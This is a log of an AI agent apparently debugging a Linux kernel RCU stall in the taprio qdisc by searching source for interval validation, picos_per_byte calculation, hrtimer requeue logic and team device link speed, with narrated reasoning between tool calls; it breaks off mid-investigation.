Results: map[SourceCode:1035: static int fill_sched_entry(struct taprio_sched *q, struct nlattr **tb,
1036: struct sched_entry *entry,
1037: struct netlink_ext_ack *extack)
1038: {
1039: int min_duration = length_to_duration(q, ETH_ZLEN);
1040: u32 interval = 0;
1041:
1042: if (tb[TCA_TAPRIO_SCHED_ENTRY_CMD])
1043: entry->command = nla_get_u8(
1044: tb[TCA_TAPRIO_SCHED_ENTRY_CMD]);
1045:
1046: if (tb[TCA_TAPRIO_SCHED_ENTRY_GATE_MASK])
1047: entry->gate_mask = nla_get_u32(
1048: tb[TCA_TAPRIO_SCHED_ENTRY_GATE_MASK]);
1049:
1050: if (tb[TCA_TAPRIO_SCHED_ENTRY_INTERVAL])
1051: interval = nla_get_u32(
1052: tb[TCA_TAPRIO_SCHED_ENTRY_INTERVAL]);
1053:
1054: /* The interval should allow at least the minimum ethernet
1055: * frame to go out.
1056: */
1057: if (interval < min_duration) {
1058: NL_SET_ERR_MSG(extack, "Invalid interval for schedule entry");
1059: return -EINVAL;
1060: }
1061:
1062: entry->interval = interval;
1063:
1064: return 0;
1065: }
SourceFile:net/sched/sch_taprio.c]
|
| 18/2 |
2026/05/24 13:26 |
llm |
expert |
0m
Model:
Tokens:
input: 23074
output: 44
thoughts: 39
Thoughts: Okay, let me break this down.
**Decoding This Time Interval Check**
Hmm, so I see a comparison: `interval < min_duration`. My immediate question is, what the heck is `min_duration` in this context? Let's trace it back. Ah, there it is: `min_duration` is defined as `length_to_duration(q, ETH_ZLEN)`. This means it's taking the length of something, which looks like `q`, and converting it to a time duration using the constant `ETH_ZLEN`.
So, the code is checking if some `interval` is less than a calculated minimum duration that's based on the length of something, `q`, presumably a queue or a data structure related to the network. This length is converted to a time with the ETH_ZLEN value.
|
| 19/2 |
2026/05/24 13:26 |
tool |
codesearch-definition-source |
0m
Args: map[ContextFile:net/sched/sch_taprio.c IncludeLines:true Name:length_to_duration]
Results: map[SourceCode: 257: static int length_to_duration(struct taprio_sched *q, int len)
258: {
259: return div_u64(len * atomic64_read(&q->picos_per_byte), PSEC_PER_NSEC);
260: }
SourceFile:net/sched/sch_taprio.c]
|
| 20/2 |
2026/05/24 13:26 |
llm |
expert |
0m
Model:
Tokens:
input: 23450
output: 63
thoughts: 35
Thoughts: Okay, here's my take on those thoughts, framed as my own mental process, given my expertise:
**Potential Zero-Division Trap**
Alright, that `q->picos_per_byte` variable – I need to be *absolutely* sure it's not zero. That smells like a classic, hard-to-debug division-by-zero risk, especially in low-level code. We're probably doing calculations with that, so a zero value would just blow things up. Time to trace back where that thing is initialized and set. Need to see how robustly we handle potentially invalid data or edge cases during configuration or input. I want to know not only *if* it could be zero, but *under what circumstances* and *how often*? This feels like it needs a code dive, and a test case!
|
| 21/2 |
2026/05/24 13:26 |
tool |
codesearch-find-references |
0m
Error:
Args: map[ContextFile:net/sched/sch_taprio.c IncludeSnippetLines:2 Name:picos_per_byte SourceTreePrefix:net/sched/sch_taprio.c]
Results: map[References:<nil> TruncatedOutput:false]
|
| 22/2 |
2026/05/24 13:26 |
llm |
expert |
0m
Model:
Tokens:
input: 23745
output: 68
thoughts: 15
Thoughts: Okay, here's my interpretation of that thought process, assuming I'm an expert in this area and the context is clear:
**Initial Assessment: Structure Identification**
Alright, my brain just kicked in, and the first thing I registered is "field of `struct taprio_sched`." That immediately narrows the scope. This isn't some generic data structure; it's a specific field related to the Time-Aware Priority Scheduling (TAPRIO) scheduler. Knowing that `taprio_sched` is a structure, I’m mentally pulling up its likely contents, thinking about how it’s organized. I'm already anticipating what kinds of parameters and data members it might contain. Things like: is it related to queue parameters? Traffic shaping? Scheduling policies? I'm already primed to think about this in the context of network traffic management. The "field of" part is key – I'm thinking about where this `taprio_sched` struct *lives* within a larger structure or context. Is it nested within something else, like a configuration struct for a network interface or a scheduler instance? I immediately need to understand the relationship of this field within the larger system.
|
| 23/2 |
2026/05/24 13:26 |
tool |
codesearch-find-references |
0m
Args: map[ContextFile:net/sched/sch_taprio.c IncludeSnippetLines:2 Name:taprio_sched::picos_per_byte SourceTreePrefix:net/sched/sch_taprio.c]
Results: map[References:[map[ReferenceKind:takes-address-of ReferencingEntityKind:function ReferencingEntityName:duration_to_length SourceFile:net/sched/sch_taprio.c SourceLine:264 SourceSnippet: 262: static int duration_to_length(struct taprio_sched *q, u64 duration)
263: {
264: return div_u64(duration * PSEC_PER_NSEC, atomic64_read(&q->picos_per_byte));
265: }
] map[ReferenceKind:takes-address-of ReferencingEntityKind:function ReferencingEntityName:length_to_duration SourceFile:net/sched/sch_taprio.c SourceLine:259 SourceSnippet: 257: static int length_to_duration(struct taprio_sched *q, int len)
258: {
259: return div_u64(len * atomic64_read(&q->picos_per_byte), PSEC_PER_NSEC);
260: }
] map[ReferenceKind:takes-address-of ReferencingEntityKind:function ReferencingEntityName:taprio_set_budgets SourceFile:net/sched/sch_taprio.c SourceLine:675 SourceSnippet: 673: else
674: budget = div64_u64((u64)entry->gate_duration[tc] * PSEC_PER_NSEC,
675: atomic64_read(&q->picos_per_byte));
676:
677: atomic_set(&entry->budget[tc], budget);
] map[ReferenceKind:takes-address-of ReferencingEntityKind:function ReferencingEntityName:taprio_set_picos_per_byte SourceFile:net/sched/sch_taprio.c SourceLine:1319 SourceSnippet:1317: }
1318:
1319: atomic64_set(&q->picos_per_byte, picos_per_byte);
1320: netdev_dbg(dev, "taprio: set %s's picos_per_byte to: %lld, linkspeed: %d\n",
1321: dev->name, (long long)atomic64_read(&q->picos_per_byte),
] map[ReferenceKind:takes-address-of ReferencingEntityKind:function ReferencingEntityName:taprio_set_picos_per_byte SourceFile:net/sched/sch_taprio.c SourceLine:1320 SourceSnippet:1318:
1319: atomic64_set(&q->picos_per_byte, picos_per_byte);
1320: netdev_dbg(dev, "taprio: set %s's picos_per_byte to: %lld, linkspeed: %d\n",
1321: dev->name, (long long)atomic64_read(&q->picos_per_byte),
1322: ecmd.base.speed);
]] TruncatedOutput:false]
|
| 24/2 |
2026/05/24 13:26 |
llm |
expert |
0m
Model:
Tokens:
input: 24919
output: 50
thoughts: 17
Thoughts: Okay, here's my interpretation of that thought process, assuming I'm deep in my domain of expertise:
**Checking `taprio_set_picos_per_byte`**
Right, let's take a quick look at `taprio_set_picos_per_byte`. I need to ensure that the pico-seconds per byte configuration is correct. Is this a new deployment? Have there been any recent changes to the hardware or the underlying system that might necessitate a review of this setting? This function dictates the granularity of our timing adjustments, so its accuracy is paramount to performance and stability. I need to make sure the value is appropriate for the current setup. I'll mentally run through the relevant hardware specifications – the clock rate, the memory speed, potential overheads... Does this specific value align with the expected behavior? I need to be sure. I'll quickly recall the impact of this parameter on the scheduler. What are the potential consequences if it's incorrect – excessive jitter? Underscheduling? Over-scheduling? Time to verify.
|
| 25/2 |
2026/05/24 13:26 |
tool |
codesearch-definition-source |
0m
Args: map[ContextFile:net/sched/sch_taprio.c IncludeLines:true Name:taprio_set_picos_per_byte]
Results: map[SourceCode:1291: static void taprio_set_picos_per_byte(struct net_device *dev,
1292: struct taprio_sched *q,
1293: struct netlink_ext_ack *extack)
1294: {
1295: struct ethtool_link_ksettings ecmd;
1296: int speed = SPEED_10;
1297: int picos_per_byte;
1298: int err;
1299:
1300: err = __ethtool_get_link_ksettings(dev, &ecmd);
1301: if (err < 0)
1302: goto skip;
1303:
1304: if (ecmd.base.speed && ecmd.base.speed != SPEED_UNKNOWN)
1305: speed = ecmd.base.speed;
1306:
1307: skip:
1308: picos_per_byte = (USEC_PER_SEC * 8) / speed;
1309: if (picos_per_byte < TAPRIO_PICOS_PER_BYTE_MIN) {
1310: if (!extack)
1311: pr_warn("Link speed %d is too high. Schedule may be inaccurate.\n",
1312: speed);
1313: NL_SET_ERR_MSG_FMT_MOD(extack,
1314: "Link speed %d is too high. Schedule may be inaccurate.",
1315: speed);
1316: picos_per_byte = TAPRIO_PICOS_PER_BYTE_MIN;
1317: }
1318:
1319: atomic64_set(&q->picos_per_byte, picos_per_byte);
1320: netdev_dbg(dev, "taprio: set %s's picos_per_byte to: %lld, linkspeed: %d\n",
1321: dev->name, (long long)atomic64_read(&q->picos_per_byte),
1322: ecmd.base.speed);
1323: }
SourceFile:net/sched/sch_taprio.c]
|
| 26/2 |
2026/05/24 13:26 |
llm |
expert |
0m
Model:
Tokens:
input: 25819
output: 68
thoughts: 92
Thoughts: **Analyzing the Timing Calculation**
Okay, let's break this down. I'm looking at this calculation, specifically at how `picos_per_byte` is derived. The first thing I'm registering is that it *must* be at least `TAPRIO_PICOS_PER_BYTE_MIN`. That's a fundamental constraint, a lower bound. But, I'm already thinking ahead, considering edge cases... what if the input `speed` is exceptionally high? As `speed` gets arbitrarily large, `picos_per_byte` could conceivably become very, very small – potentially smaller than that minimum. But, the code explicitly states that `picos_per_byte` can't go below that minimum, right? So, this suggests a clamping or saturation mechanism is likely present implicitly or explicitly in the code - perhaps I should check that. The crucial question that's driving my thought process now is: what is the actual value of `TAPRIO_PICOS_PER_BYTE_MIN`? That value defines the floor and its relationship with the value of `speed` in determining the value. I need to understand that value. I need to find the definition of `TAPRIO_PICOS_PER_BYTE_MIN` because it's key to validating the entire logic.
|
| 27/2 |
2026/05/24 13:26 |
tool |
codesearch-find-references |
0m
Error:
Args: map[ContextFile:net/sched/sch_taprio.c IncludeSnippetLines:2 Name:TAPRIO_PICOS_PER_BYTE_MIN SourceTreePrefix:net/sched/sch_taprio.c]
Results: map[References:<nil> TruncatedOutput:false]
|
| 28/2 |
2026/05/24 13:26 |
llm |
expert |
0m
Model:
Tokens:
input: 26274
output: 25
thoughts: 18
Thoughts: Here's my thought process, as it were:
**Finding the Right Constant**
Okay, I need to figure out where this `TAPRIO_PICOS_PER_BYTE_MIN` constant is defined. My first instinct, given I'm probably working within a codebase, is to reach for `grep`. That's the most efficient way to locate a variable or constant definition in a bunch of source files, especially if I don't remember the exact module or header where it's located. `grep` should quickly pinpoint the file and line number. Hopefully it's straightforward and I find the definition on the first try!
|
| 29/2 |
2026/05/24 13:26 |
tool |
grepper |
0m
Args: map[Expression:TAPRIO_PICOS_PER_BYTE_MIN]
Results: map[Output:net/sched/sch_taprio.c=37=static struct static_key_false taprio_have_working_mqprio;
--
net/sched/sch_taprio.c-49- */
net/sched/sch_taprio.c:50:#define TAPRIO_PICOS_PER_BYTE_MIN 17
net/sched/sch_taprio.c-51-
--
net/sched/sch_taprio.c=1291=static void taprio_set_picos_per_byte(struct net_device *dev,
--
net/sched/sch_taprio.c-1308- picos_per_byte = (USEC_PER_SEC * 8) / speed;
net/sched/sch_taprio.c:1309: if (picos_per_byte < TAPRIO_PICOS_PER_BYTE_MIN) {
net/sched/sch_taprio.c-1310- if (!extack)
--
net/sched/sch_taprio.c-1315- speed);
net/sched/sch_taprio.c:1316: picos_per_byte = TAPRIO_PICOS_PER_BYTE_MIN;
net/sched/sch_taprio.c-1317- }
]
|
| 30/2 |
2026/05/24 13:26 |
llm |
expert |
0m
Model:
Tokens:
input: 26781
output: 45
thoughts: 590
Thoughts: **Analyzing Potential RCU Stall in TAPRIO Scheduler**
Okay, so I'm digging into this TAPRIO scheduler code, and I see this calculation for `min_duration`. It starts with `picos_per_byte` being at least 17, and then it goes through `length_to_duration(q, ETH_ZLEN)`. I remember `ETH_ZLEN` is 60, so we're looking at `60 * 17 = 1020`. Then, since `PSEC_PER_NSEC` is 1000, we're essentially getting `1020 / 1000 = 1`. So, `min_duration` is apparently 1, in some unit, possibly nanoseconds.
Wait, if `min_duration` is just 1 (nanosecond), and `interval` is set to 1, then the `end_time` update, `ktime_add_ns(entry->end_time, next->interval)`, is going to be incredibly small. If `interval` is that small, the hrtimer will fire almost immediately.
Then, I'm looking at the reproducer. It sets `TCA_TAPRIO_SCHED_ENTRY_INTERVAL` to values like `0x4000000` and `0x101`. Okay, `0x101` is 257. So, we're probably dealing with an `interval` of 257 nanoseconds. Okay, so if the interval is 257 ns, that's not huge but the hrtimer would fire every 257 ns. And *that* is probably enough to cause an RCU stall. If the hrtimer fires every 257 ns, the CPU is going to spend all its time handling hrtimers.
Then I am thinking, `advance_sched` returns `HRTIMER_RESTART`. If `end_time` is in the past, `hrtimer_set_expires` will set the expiration time in the past. If the expiration time is still in the past, `__run_hrtimer` will see that the timer is expired and run it again. Wait, if `__run_hrtimer` returns `HRTIMER_RESTART`, it re-enqueues the timer. And if the expiration time is *still* in the past, then it fires again immediately! This sounds like a tight loop.
I need to back up for a second. `__hrtimer_run_queues` is key here. It has a loop that looks like this:
```
while ((node = timerqueue_getnext(&base->active))) {
struct hrtimer *timer;
timer = container_of(node, struct hrtimer, node);
if (base->softirq_time < hrtimer_get_softexpires(timer))
break;
```
Now, `base->softirq_time`--is that *not* updated inside the loop? I'm missing something important. Let me double-check `__hrtimer_run_queues`.
|
| 31/2 |
2026/05/24 13:27 |
tool |
codesearch-definition-source |
0m
Args: map[ContextFile:kernel/time/hrtimer.c IncludeLines:true Name:__hrtimer_run_queues]
Results: map[SourceCode:1809: static void __hrtimer_run_queues(struct hrtimer_cpu_base *cpu_base, ktime_t now,
1810: unsigned long flags, unsigned int active_mask)
1811: {
1812: struct hrtimer_clock_base *base;
1813: unsigned int active = cpu_base->active_bases & active_mask;
1814:
1815: for_each_active_base(base, cpu_base, active) {
1816: struct timerqueue_node *node;
1817: ktime_t basenow;
1818:
1819: basenow = ktime_add(now, base->offset);
1820:
1821: while ((node = timerqueue_getnext(&base->active))) {
1822: struct hrtimer *timer;
1823:
1824: timer = container_of(node, struct hrtimer, node);
1825:
1826: /*
1827: * The immediate goal for using the softexpires is
1828: * minimizing wakeups, not running timers at the
1829: * earliest interrupt after their soft expiration.
1830: * This allows us to avoid using a Priority Search
1831: * Tree, which can answer a stabbing query for
1832: * overlapping intervals and instead use the simple
1833: * BST we already have.
1834: * We don't add extra wakeups by delaying timers that
1835: * are right-of a not yet expired timer, because that
1836: * timer will have to trigger a wakeup anyway.
1837: */
1838: if (basenow < hrtimer_get_softexpires_tv64(timer))
1839: break;
1840:
1841: __run_hrtimer(cpu_base, base, timer, &basenow, flags);
1842: if (active_mask == HRTIMER_ACTIVE_SOFT)
1843: hrtimer_sync_wait_running(cpu_base, flags);
1844: }
1845: }
1846: }
SourceFile:kernel/time/hrtimer.c]
|
| 32/2 |
2026/05/24 13:27 |
llm |
expert |
0m
Model:
Tokens:
input: 28735
output: 42
thoughts: 31
Thoughts: Okay, here's my attempt at summarizing that thought process, keeping in mind I'm speaking to a fellow expert:
**Understanding the `basenow` Variable in `__run_hrtimer`**
Right, so I'm digging into this `__run_hrtimer` function, and I see that `basenow` is being *passed by reference*. My immediate thought is, "Hang on a second... is `__run_hrtimer` *modifying* `basenow`? Is this function actually *updating* the value of `basenow` during its execution?" This is key. If it's *not* updating it, then I need to understand why it's being passed by reference in the first place, or I might be missing something. If it *is* changing, I need to understand how and why and how that impacts the broader system. I need to trace this variable's usage to be sure. This is where those subtle pointer bugs hide, you know? Let's check the function definition more closely.
|
| 33/2 |
2026/05/24 13:27 |
tool |
codesearch-definition-source |
0m
Args: map[ContextFile:kernel/time/hrtimer.c IncludeLines:true Name:__run_hrtimer]
Results: map[SourceCode:1734: static void __run_hrtimer(struct hrtimer_cpu_base *cpu_base,
1735: struct hrtimer_clock_base *base,
1736: struct hrtimer *timer, ktime_t *now,
1737: unsigned long flags) __must_hold(&cpu_base->lock)
1738: {
1739: enum hrtimer_restart (*fn)(struct hrtimer *);
1740: bool expires_in_hardirq;
1741: int restart;
1742:
1743: lockdep_assert_held(&cpu_base->lock);
1744:
1745: debug_deactivate(timer);
1746: base->running = timer;
1747:
1748: /*
1749: * Separate the ->running assignment from the ->state assignment.
1750: *
1751: * As with a regular write barrier, this ensures the read side in
1752: * hrtimer_active() cannot observe base->running == NULL &&
1753: * timer->state == INACTIVE.
1754: */
1755: raw_write_seqcount_barrier(&base->seq);
1756:
1757: __remove_hrtimer(timer, base, HRTIMER_STATE_INACTIVE, 0);
1758: fn = ACCESS_PRIVATE(timer, function);
1759:
1760: /*
1761: * Clear the 'is relative' flag for the TIME_LOW_RES case. If the
1762: * timer is restarted with a period then it becomes an absolute
1763: * timer. If its not restarted it does not matter.
1764: */
1765: if (IS_ENABLED(CONFIG_TIME_LOW_RES))
1766: timer->is_rel = false;
1767:
1768: /*
1769: * The timer is marked as running in the CPU base, so it is
1770: * protected against migration to a different CPU even if the lock
1771: * is dropped.
1772: */
1773: raw_spin_unlock_irqrestore(&cpu_base->lock, flags);
1774: trace_hrtimer_expire_entry(timer, now);
1775: expires_in_hardirq = lockdep_hrtimer_enter(timer);
1776:
1777: restart = fn(timer);
1778:
1779: lockdep_hrtimer_exit(expires_in_hardirq);
1780: trace_hrtimer_expire_exit(timer);
1781: raw_spin_lock_irq(&cpu_base->lock);
1782:
1783: /*
1784: * Note: We clear the running state after enqueue_hrtimer and
1785: * we do not reprogram the event hardware. Happens either in
1786: * hrtimer_start_range_ns() or in hrtimer_interrupt()
1787: *
1788: * Note: Because we dropped the cpu_base->lock above,
1789: * hrtimer_start_range_ns() can have popped in and enqueued the timer
1790: * for us already.
1791: */
1792: if (restart != HRTIMER_NORESTART &&
1793: !(timer->state & HRTIMER_STATE_ENQUEUED))
1794: enqueue_hrtimer(timer, base, HRTIMER_MODE_ABS);
1795:
1796: /*
1797: * Separate the ->running assignment from the ->state assignment.
1798: *
1799: * As with a regular write barrier, this ensures the read side in
1800: * hrtimer_active() cannot observe base->running.timer == NULL &&
1801: * timer->state == INACTIVE.
1802: */
1803: raw_write_seqcount_barrier(&base->seq);
1804:
1805: WARN_ON_ONCE(base->running != timer);
1806: base->running = NULL;
1807: }
SourceFile:kernel/time/hrtimer.c]
|
| 34/2 |
2026/05/24 13:27 |
llm |
expert |
0m
Model:
Tokens:
input: 30206
output: 44
thoughts: 401
Thoughts: **My Analysis of a Potential HRTimer Loop**
Okay, so I'm looking at this `__run_hrtimer` function, and it's striking me that it doesn't update `basenow`. That's the first thing that jumps out. Now, consider the scenario where `fn`, which is `advance_sched` in this context, returns `HRTIMER_RESTART`. This means it *restarts* the timer, setting its expiration time. If that new expiration time, after `advance_sched` has its way, ends up less than or equal to the current `basenow`, we have a problem. `__hrtimer_run_queues` would loop endlessly!
Let me trace what `advance_sched` actually does. Ah, it sets `end_time = ktime_add_ns(entry->end_time, next->interval)`. If `next->interval` is really tiny, the resulting `end_time` will be equally small. But wait, `entry->end_time` is actually the *previous* `end_time`, which is then added to `next->interval`. If `next->interval` is just 1 nanosecond, then the end time only increases by 1 ns.
Here's the problem: if `basenow` is significantly larger than `end_time`, maybe due to an interrupt delay or a past `base_time` setting, then `end_time` will *slowly* catch up to `basenow`, 1 nanosecond at a time. If there's a huge gap, like a second, that means a billion iterations! That's a textbook RCU stall.
But let's look closer at `advance_sched`. It's doing something else. It's actually:
```
end_time = ktime_add_ns(entry->end_time, next->interval);
end_time = min_t(ktime_t, end_time, oper->cycle_end_time);
```
So `end_time` isn't allowed to go past `oper->cycle_end_time`.
If `next->interval` is very small, then `end_time` will only increase very slowly. It's important to remember that `entry->end_time` is the current entry's end time.
What if the base time has changed. What if the `oper->cycle_end_time` is also in the past? Let me go check `should_restart_cycle`.
|
| 35/2 |
2026/05/24 13:27 |
tool |
codesearch-definition-source |
0m
Args: map[ContextFile:net/sched/sch_taprio.c IncludeLines:true Name:should_restart_cycle]
Results: map[SourceCode: 871: static bool should_restart_cycle(const struct sched_gate_list *oper,
872: const struct sched_entry *entry)
873: {
874: if (list_is_last(&entry->list, &oper->entries))
875: return true;
876:
877: if (ktime_compare(entry->end_time, oper->cycle_end_time) == 0)
878: return true;
879:
880: return false;
881: }
SourceFile:net/sched/sch_taprio.c]
|
| 36/2 |
2026/05/24 13:27 |
llm |
expert |
0m
Model:
Tokens:
input: 31384
output: 50
thoughts: 803
Thoughts: **Analyzing the Cycle Time Calculation for TAPRIO Schedules**
Okay, so I'm looking at this code and trying to figure out why the TAPRIO schedule is advancing so slowly in this specific case. I see that `oper->cycle_end_time` is updated within `advance_sched`, specifically if `should_restart_cycle` returns true. The key update happens here: `oper->cycle_end_time = ktime_add_ns(oper->cycle_end_time, oper->cycle_time);`. So, the cycle end time advances by `oper->cycle_time`. If `oper->cycle_time` is really small, then the advancement is equally small.
Now, I remember seeing that `parse_taprio_schedule` does some validation: `if (new->cycle_time < new->num_entries * length_to_duration(q, ETH_ZLEN))`. This sets a *minimum* for cycle time. Essentially `cycle_time` has to be at least `num_entries * length_to_duration()`. So, if `num_entries` is 2, and `length_to_duration()` is 1, then `cycle_time` must be at least 2. Even that would still be a slow advancement, only 2 ns per cycle.
Okay, let's trace `length_to_duration()`. It's defined as `div_u64(len * atomic64_read(&q->picos_per_byte), PSEC_PER_NSEC)`. `len` is usually `ETH_ZLEN`, which is 60. `PSEC_PER_NSEC` is 1000. So, the critical variable here is `picos_per_byte`. If `picos_per_byte` is 17, and the frame size is 60, we have `1020 / 1000 = 1`. Thus, the result of the function call would be 1. The small value of 1 seems to imply that `picos_per_byte` could be small and the division would cause a slow advance.
Now I recall that `picos_per_byte` depends on the link speed. If the link speed is very high, `picos_per_byte` is small. The interesting part here is that the reproducer uses a `team` device. Now I'm wondering what the reported link speed is for a `team` device. This is crucial.
Let's see. If the speed isn't known, it defaults to `SPEED_10` (10 Mbps). In that case, `picos_per_byte` would be `(1000000 * 8) / 10 = 800000`. And then `length_to_duration` would be `60 * 800000 / 1000 = 48000`. This *should* be reasonable, so I was initially wrong. But, what if the speed *is* set high?
Let's examine `taprio_set_picos_per_byte` where the link speed is actually read from `ethtool`: `err = __ethtool_get_link_ksettings(dev, &ecmd)`. If the `team` device reports a very high speed (or if one is set), then `picos_per_byte` could be *much* smaller.
And the reproducer *doesn't* appear to set the speed of the `team0` device, which makes it even more interesting. So now I need to check the `team` driver code itself, to see what speed it reports by default, because that's what seems to be at the heart of the issue here.
|
| 37/2 |
2026/05/24 13:27 |
tool |
codesearch-definition-source |
0m
Args: map[ContextFile:drivers/net/team/team.c IncludeLines:true Name:team_ethtool_get_link_ksettings]
Results: map[SourceCode:2074: static int team_ethtool_get_link_ksettings(struct net_device *dev,
2075: struct ethtool_link_ksettings *cmd)
2076: {
2077: struct team *team= netdev_priv(dev);
2078: unsigned long speed = 0;
2079: struct team_port *port;
2080:
2081: cmd->base.duplex = DUPLEX_UNKNOWN;
2082: cmd->base.port = PORT_OTHER;
2083:
2084: rcu_read_lock();
2085: list_for_each_entry_rcu(port, &team->port_list, list) {
2086: if (team_port_txable(port)) {
2087: if (port->state.speed != SPEED_UNKNOWN)
2088: speed += port->state.speed;
2089: if (cmd->base.duplex == DUPLEX_UNKNOWN &&
2090: port->state.duplex != DUPLEX_UNKNOWN)
2091: cmd->base.duplex = port->state.duplex;
2092: }
2093: }
2094: rcu_read_unlock();
2095:
2096: cmd->base.speed = speed ? : SPEED_UNKNOWN;
2097:
2098: return 0;
2099: }
SourceFile:drivers/net/team/team_core.c]
|
| 38/2 |
2026/05/24 13:27 |
llm |
expert |
0m
Model:
Tokens:
input: 33497
output: 68
thoughts: 682
Thoughts: **Debugging a TAPRIO Schedule Entry Interval Issue**
Okay, so I'm looking at this TAPRIO setup and running into a puzzling issue. The code seems pretty straightforward, but the reproducer is behaving in a way that doesn't make sense based on my understanding. Let's break this down.
Firstly, if there are no ports, the `speed` is set to 0, which correctly returns `SPEED_UNKNOWN`. However, I see `taprio_set_picos_per_byte` then defaults `speed` to `SPEED_10` which is 10 Mbps. Now, let's confirm the calculation of `picos_per_byte`. If speed is `SPEED_10` (10), the calculation gives `picos_per_byte = (1000000 * 8) / 10 = 800000`. Next, the `length_to_duration` is then derived as `60 * 800000 / 1000 = 48000`. So, the `min_duration` should be 48000.
Now, here's the kicker: the reproducer sets the `TCA_TAPRIO_SCHED_ENTRY_INTERVAL` to `0x4000000` (67108864) and `0x101` (257). Given that `min_duration` is 48000, 257 should be less than 48000, which means the `fill_sched_entry` should fail with an "Invalid interval for schedule entry" error! But it's not failing, and that's the problem.
Let me double-check the `picos_per_byte` calculation. The code clearly shows:
```
picos_per_byte = (USEC_PER_SEC * 8) / speed;
```
Okay, `USEC_PER_SEC` is 1000000. So, with a `speed` of `SPEED_10`, or 10, the result is `picos_per_byte = 1000000 * 8 / 10 = 800000`. So far, so good. Yes, `SPEED_10` *is* 10 Mbps.
Okay, checking `taprio_set_picos_per_byte` again, the code shows:
```
int speed = SPEED_10;
```
Okay, `SPEED_10` *is* 10. But, what if the speed is something else? Does the reproducer actually set the speed? Let's see what the reproducer is doing. It's calling `syscall(__NR_ioctl, /*fd=*/r[0], /*cmd=*/0x8933, /*arg=*/0x200000000500ul);`. The `0x8933` is `SIOCGIFINDEX`, so it's just getting the ifindex of team0. No, it isn't changing the speed.
So, if `min_duration` is 48000, why is the reproducer succeeding? Let's go back and examine `length_to_duration`.
```
static int length_to_duration(struct taprio_sched *q, int len)
{
return div_u64(len * atomic64_read(&q->picos_per_byte), PSEC_PER_NSEC);
}
```
Wait a second. What if `q->picos_per_byte` is *0*? That would change everything. The calculation would be invalid. When is `taprio_set_picos_per_byte` *actually* called? I need to track this down. Perhaps that's the root of the problem.
|
| 39/2 |
2026/05/24 13:27 |
tool |
codesearch-find-references |
0m
Args: map[ContextFile:net/sched/sch_taprio.c IncludeSnippetLines:2 Name:taprio_set_picos_per_byte SourceTreePrefix:net/sched/sch_taprio.c]
Results: map[References:[map[ReferenceKind:calls ReferencingEntityKind:function ReferencingEntityName:taprio_change SourceFile:net/sched/sch_taprio.c SourceLine:1862 SourceSnippet:1860:
1861: /* Needed for length_to_duration() during netlink attribute parsing */
1862: taprio_set_picos_per_byte(dev, q, extack);
1863:
1864: err = taprio_parse_mqprio_opt(dev, mqprio, extack, q->flags);
] map[ReferenceKind:calls ReferencingEntityKind:function ReferencingEntityName:taprio_dev_notifier SourceFile:net/sched/sch_taprio.c SourceLine:1342 SourceSnippet:1340: continue;
1341:
1342: taprio_set_picos_per_byte(dev, q, NULL);
1343:
1344: stab = rtnl_dereference(q->root->stab);
]] TruncatedOutput:false]
|
| 40/2 |
2026/05/24 13:27 |
llm |
expert |
0m
Model:
Tokens:
input: 35416
output: 45
thoughts: 166
Thoughts: **Analyzing the Taprio Qdisc Configuration**
Okay, so I'm looking at this `taprio_change` function and remembering that it's the entry point for either creating *or* modifying a taprio qdisc. The first thing that catches my eye is this call to `taprio_set_picos_per_byte` – seems like a critical early step, right? It sets the relationship between packet length and duration, which will be essential later on.
I'm thinking now about how the system handles the `parse_taprio_schedule` function, it seems like we set the `picos_per_byte` *before* that function is called. Then I'm remembering a scenario that should have failed. Thinking about the implications of having a `picos_per_byte` value set to 800000, then according to my calculations, that means a `min_duration` of 48000. Under those circumstances an `interval = 257` would be rejected! That doesn't make any sense.
The question then is why isn't it rejected? There must be some factor which is overriding this expectation. Perhaps the calculation of `min_duration` is not straightforward. I'd better double-check to make sure my assumptions are correct. The first thing I will do is to verify what `SPEED_10` actually resolves to. I'll need to know this to be sure of the state of the configuration.
|
| 41/2 |
2026/05/24 13:27 |
tool |
codesearch-definition-source |
0m
Error:
Args: map[ContextFile:include/uapi/linux/ethtool.h IncludeLines:true Name:SPEED_10]
Results: map[SourceCode: SourceFile:]
|
| 42/2 |
2026/05/24 13:27 |
llm |
expert |
0m
Model:
Tokens:
input: 35964
output: 20
thoughts: 11
Thoughts: Okay, here's my interpretation of that thought process, tailored for an expert audience:
**Analyzing for SPEED_10**
Alright, the directive is clear – my immediate instinct is to jump to `grep`. The environment demands rapid analysis, and that usually means leveraging powerful, line-oriented text search tools. Focusing on `SPEED_10` suggests I'm after a specific configuration variable, code snippet, or log entry related to a speed setting. My brain is already anticipating the likely file locations I'll need to target: configuration files in `/etc`, perhaps log files under `/var/log`, or even within the source code of the relevant application in, maybe `/usr/local/src` or `/opt`. The specifics of my target system will guide these assumptions, but my aim is always to narrow down the search space as quickly as possible. I'll need to consider wildcards and regexes, of course. I'm going to start with a broad `grep -r "SPEED_10" .` and see what that gets me before I get too fancy.
|
| 43/2 |
2026/05/24 13:28 |
tool |
grepper |
0m
Args: map[Expression:#define SPEED_10]
Results: map[Output:drivers/net/ethernet/atheros/atlx/atlx.h-23-#define SPEED_0 0xffff
drivers/net/ethernet/atheros/atlx/atlx.h:24:#define SPEED_10 10
drivers/net/ethernet/atheros/atlx/atlx.h:25:#define SPEED_100 100
drivers/net/ethernet/atheros/atlx/atlx.h:26:#define SPEED_1000 1000
drivers/net/ethernet/atheros/atlx/atlx.h-27-#define HALF_DUPLEX 1
--
drivers/net/ethernet/intel/e1000/e1000_hw.h=374=void e1000_io_write(struct e1000_hw *hw, unsigned long port, u32 value);
--
drivers/net/ethernet/intel/e1000/e1000_hw.h-431-
drivers/net/ethernet/intel/e1000/e1000_hw.h:432:#define SPEED_10 10
drivers/net/ethernet/intel/e1000/e1000_hw.h:433:#define SPEED_100 100
drivers/net/ethernet/intel/e1000/e1000_hw.h:434:#define SPEED_1000 1000
drivers/net/ethernet/intel/e1000/e1000_hw.h-435-#define HALF_DUPLEX 1
--
drivers/net/ethernet/intel/igb/e1000_defines.h-255-
drivers/net/ethernet/intel/igb/e1000_defines.h:256:#define SPEED_10 10
drivers/net/ethernet/intel/igb/e1000_defines.h:257:#define SPEED_100 100
drivers/net/ethernet/intel/igb/e1000_defines.h:258:#define SPEED_1000 1000
drivers/net/ethernet/intel/igb/e1000_defines.h-259-#define SPEED_2500 2500
--
drivers/net/ethernet/intel/igbvf/defines.h-52-
drivers/net/ethernet/intel/igbvf/defines.h:53:#define SPEED_10 10
drivers/net/ethernet/intel/igbvf/defines.h:54:#define SPEED_100 100
drivers/net/ethernet/intel/igbvf/defines.h:55:#define SPEED_1000 1000
